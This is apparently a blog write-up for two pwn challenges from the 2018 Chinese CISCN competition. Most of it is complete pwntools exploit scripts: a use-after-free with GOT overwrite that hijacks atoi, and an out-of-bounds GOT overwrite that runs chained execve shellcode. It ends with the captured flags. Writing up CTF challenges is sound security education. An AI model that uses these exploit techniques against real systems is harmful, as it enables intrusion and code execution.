ciscn2018-pwn-wp

Author Avatar
hac425 5月 01, 2018
  • 在其它设备中阅读本文章

2018全国大学生网络安全竞赛 ,做了2 道题

task_supermarket

change_desc 里面调用 realloc 会触发 uaf

paste image
利用 uaf 修改 obj->desc_ptr 为 atoi@got , 泄露 libc, 使用 libc-database 找到相应的 libc
修改 atoi@got 为 system ,然后 输入 sh , getshell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
from pwn import *
from time import sleep
context(os='linux', log_level='info')
context.terminal = ['tmux', 'splitw', '-h']
# p = process("./task_supermarket")
p = remote("117.78.43.197", 32138)
def add(name, price, descrip_size, description):
    sleep(0.2)
    p.recvuntil("your choice>> ")
    p.sendline('1')
    p.recvuntil("name:")
    sleep(0.2)
    p.sendline(name)    
    p.recvuntil("price:")
    sleep(0.2)
    p.sendline(str(price))
    p.recvuntil("descrip_size:")
    sleep(0.2)
    p.sendline(str(descrip_size))
    p.recvuntil("description:")
    sleep(0.1)
    p.send(description)
def free(name):
    p.recvuntil("your choice>> ")
    p.sendline('2')
    p.recvuntil("name:")
    sleep(0.2)
    p.sendline(name)   
def list():
    p.recvuntil("your choice>> ")
    p.sendline('3')
def change_price(name,  value):
    p.recvuntil("your choice>> ")
    p.sendline('4')
    p.recvuntil("name:")
    p.sendline(name)   
    p.recvuntil("input the value you want to cut or rise in:")
    p.sendline(str(value))
def change_desc(name, descrip_size, description):
    p.recvuntil("your choice>> ")
    p.sendline('5')
    p.recvuntil("name:")
    sleep(0.2)
    p.sendline(name)   
    p.recvuntil("descrip_size:")
    sleep(0.2)
    p.sendline(str(descrip_size))
    p.recvuntil("description:")
    sleep(0.2)
    p.send(description)
add('0', 80, 0x1c, '\n')
add('1', 80, 0x1c, '\n')
add('2', 80, 0x1c, '\n')
add('3', 80, 0x1c, '\n')
change_desc('1', 0x30, '\n')
add('4', 80, 0x1c, '\n')
add('5', 80, 0x80, '\n')
read_got = 0x0804B010
atoi_got = 0x0804B048
payload = p32(0x34)
payload += p32(0) * 3
payload += p32(0x50)
payload += '\x90\n'
change_desc('1', 0x1c, payload)
payload = '\x00' * (0x20 - 8)
payload += p32(0)
payload += p32(0x21)
payload += p32(0x35)
payload += p32(0) * 3
payload += p32(0x50)
payload += p32(0x90)
payload += p32(atoi_got)
change_desc('4', 0x90, payload + '\n')
list()
p.recvuntil("5: price.80, des.")
libc = ELF("/home/haclh/workplace/libc-database/db/libc6-i386_2.23-0ubuntu9_amd64.so")
leak = u32(p.recv(4))
libc.address = leak - libc.symbols['atoi']
info("libc: " + hex(libc.address))
info("leak: " + hex(leak))
payload = p32(libc.symbols['system'])
change_desc('5', 0x90, payload + '\n')
# gdb.attach(p)
# pause()
p.recvuntil("your choice>> ")
p.sendline("sh")
p.interactive()

flag: ciscn{1beba07b6a3232220b92429c6a0ac1e4}
task_note_service2
add 的时候会越界。

paste image

程序没开 nx, 利用越界改 exit@got 为 堆地址,然后布置 shellcode , 由于严格控制大小。使用 短跳转 连接各条 shellcode 需要的语句。用到的 shellcode 为

1
2
3
4
5
6
7
8
9
10
11
12
xor esi, esi
push rsi
push rsi
mov  ebx, 0x6e69622f
mov [rsp], ebx
mov  ebx, 0x68732f2f
mov [rsp+4], ebx
mov rdi, rsp
push 0x3b
pop rax
xor rdx,rdx
syscall

最终 exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
from pwn import *
from time import sleep
context(os='linux', log_level='debug')
context.terminal = ['tmux', 'splitw', '-h']
# p = process("./task_note_service2")
p = remote("49.4.23.165", 32510)
base = 0x555555554000
def add(idx, content):
    sleep(0.2)
    p.recvuntil("your choice>> ")
    p.sendline('1')
    p.recvuntil("index:")
    sleep(0.2)
    p.sendline(str(idx))
    p.recvuntil("size:")
    sleep(0.2)
    p.sendline(str(len(content)))
    p.recvuntil("content:")
    sleep(0.2)
    p.send(content)
def free(idx):
    p.recvuntil("your choice>> ")
    p.sendline('2')
    p.recvuntil("index:")
    sleep(0.2)
    p.sendline(str(idx))
gdb_command = '''
x/20xg {}
break *0x0000555555757030
c
'''.format(hex(base + 0x2020A0))
add(-7, '\x90\x31\xf6\x56\x56\xeb\x19\n')  # exit ---> shellocde
add(0,  '\xbb\x2f\x62\x69\x6e\xeb\x19\n')  # push
add(1,  '\x90\x90\x89\x1c\x24\xeb\x19\n')  # push
add(2,  '\xbb\x2f\x2f\x73\x68\xeb\x19\n')  # push
add(3,  '\x89\x5c\x24\x04\x90\xeb\x19\n')  # push
add(4,  '\x48\x89\xe7\x6a\x3b\xeb\x19\n')  # push
add(5,  '\x58\x48\x31\xd2\x0f\x05\n')  # push
# gdb.attach(p, gdb_command)
# pause()
p.recvuntil("your choice>>")
p.sendline("5")
p.interactive()
'''
xor esi, esi
push rsi
push rsi
mov  ebx, 0x6e69622f
mov [rsp], ebx
mov  ebx, 0x68732f2f
mov [rsp+4], ebx
mov rdi, rsp
push 0x3b
pop rax
xor rdx,rdx
syscall
'''

flag: ciscn{133fb0f0ca3ddf24964975f1ab94d082}

本站文章均原创, 转载注明来源
本文链接:http://blog.hac425.top/2018/05/01/ciscn2018-pwn-wp.html